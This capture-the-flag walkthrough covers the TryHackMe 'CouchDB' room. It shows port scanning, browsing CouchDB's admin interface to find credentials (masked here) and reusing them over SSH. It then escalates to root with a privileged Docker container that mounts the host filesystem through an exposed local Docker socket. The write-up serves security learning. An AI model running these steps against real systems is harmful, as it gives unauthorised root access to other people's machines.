TryHackMe: CouchDB
Scan the machine. How many ports are open?
Ok, first thing is first let's add to our /etc/hosts
and run rustscan
to see what we have....
╰─⠠⠵ rustscan -a couch --ulimit 10000 -- -sC -sV -oA couch -v
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.92.201:22
Open 10.10.92.201:5984
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 20:37 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Initiating Ping Scan at 20:37
Scanning 10.10.92.201 [2 ports]
Completed Ping Scan at 20:37, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 20:37
Scanning couch (10.10.92.201) [2 ports]
Discovered open port 22/tcp on 10.10.92.201
Discovered open port 5984/tcp on 10.10.92.201
Completed Connect Scan at 20:37, 0.03s elapsed (2 total ports)
Initiating Service scan at 20:37
Scanning 2 services on couch (10.10.92.201)
Completed Service scan at 20:37, 11.15s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.92.201.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 1.33s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.14s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Nmap scan report for couch (10.10.92.201)
Host is up, received conn-refused (0.034s latency).
Scanned at 2021-07-09 20:37:33 BST for 12s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMXnGZUnLWqLZb8VQiVH0z85lV+G4KY5l5kKf1fS7YgSnfZ+k3CRjAZPuGceg5RQEUbOMCm+0u4SDyIEbwwAXGv0ORK4/VEIyJlZmtlqeyASwR8ML4yjdGqinqOUZ3jN/ZIg4veJ02nr86GZP+Nto0TZt7beaIxykMEZHTdo0CctdKLIet7PpvwG4F5Tn9MBoys9pUjfpcnwbf91Tv6i56Gipo07jKgb5vP8Nl1TXPjWB93WNW2vWEQ1J4tiyZlBeLOaNaEbxvNQFnKxjVYiiLCbcofwSdrwZ7/+sIy5BdiNW+k81rBN3OqaQNZ8urFaiXXf/ukRr/hhjY5a6m0MHn
| 256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNTR07g3p8MfnQVnv8uqj8GGDH6VoSRzwRFflMbEf3WspsYyVipg6vtNQMaq5uNGUXF8ubpsnHeJA+T3RilTLXc=
| 256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLUyz2Tpwc5qPuFxV+HnGBeqLC6NWrmpmGmE0hk7Hlj
5984/tcp open http syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-favicon: Unknown favicon MD5: 2AB2AAE806E8393B70970B2EAACE82E0
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
Answer: 2
What is the database management system installed on the server?
From our nmap
scan we can see that the service on 5984/tcp
is couchdb
5984/tcp open http syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)
Answer: CouchDB
What port is the database management system running on?
Again from our scan we can see the port
Answer: 5984
What is the version of the management system installed on the server?
Again from our scan we can see the version
Answer: 1.6.1
What is the path for the web administration tool for this database ## management system?
Some insert search engine verb here reveals the URL to use
Answer: _utils
What is the path to list all databases in the web browser of the database management system?
Answer: _all_dbs
What are the credentials found in the web administration tool?
Looking at the secrets
database we see a entry for the username password
Answer:
***********:***********
Compromise the machine and locate user.txt
Attempting to log in via ssh
we see the above credentials have been reused .... From here we can cat
the flag file user.txt
atena@ubuntu:~$ cat user.txt
THM{***********}
Answer: THM{***********}
Escalate privileges and obtain root.txt
Let's see if we can own
the box, first up is sudo -l
atena@ubuntu:~$ sudo -l
[sudo] password for atena:
Sorry, user atena may not run sudo on ubuntu.
No.... let's see what groups we are in
atena@ubuntu:~$ id
uid=1000(atena) gid=1000(atena) groups=1000(atena),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
OK adm
might help, but in the meantime let's copy over linpeas.sh
and see if we spot anything interesting.....
╔══════════╣ Useful software
/usr/bin/docker
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:5984 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:32986 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::*
-rwsr-xr-x 1 root root 134K Jan 31 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
Digging around the output I can not see much, I end up looking at the .bash_histroy
file and find a docker command.
166 docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
Using this we can connect to a container running on our target with the host filesystem mounted under /mnt
. As we we are root
in the container we can access /mnt/root
and get our flag.
atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # ls /mnt/
bin/ home/ lib64/ opt/ sbin/ usr/
boot/ initrd.img lost+found/ proc/ srv/ var/
dev/ initrd.img.old media/ root/ sys/ vmlinuz
etc/ lib/ mnt/ run/ tmp/ vmlinuz.old
/ # cat /mnt/root/root.txt
THM{***********}
Answer: THM{***********}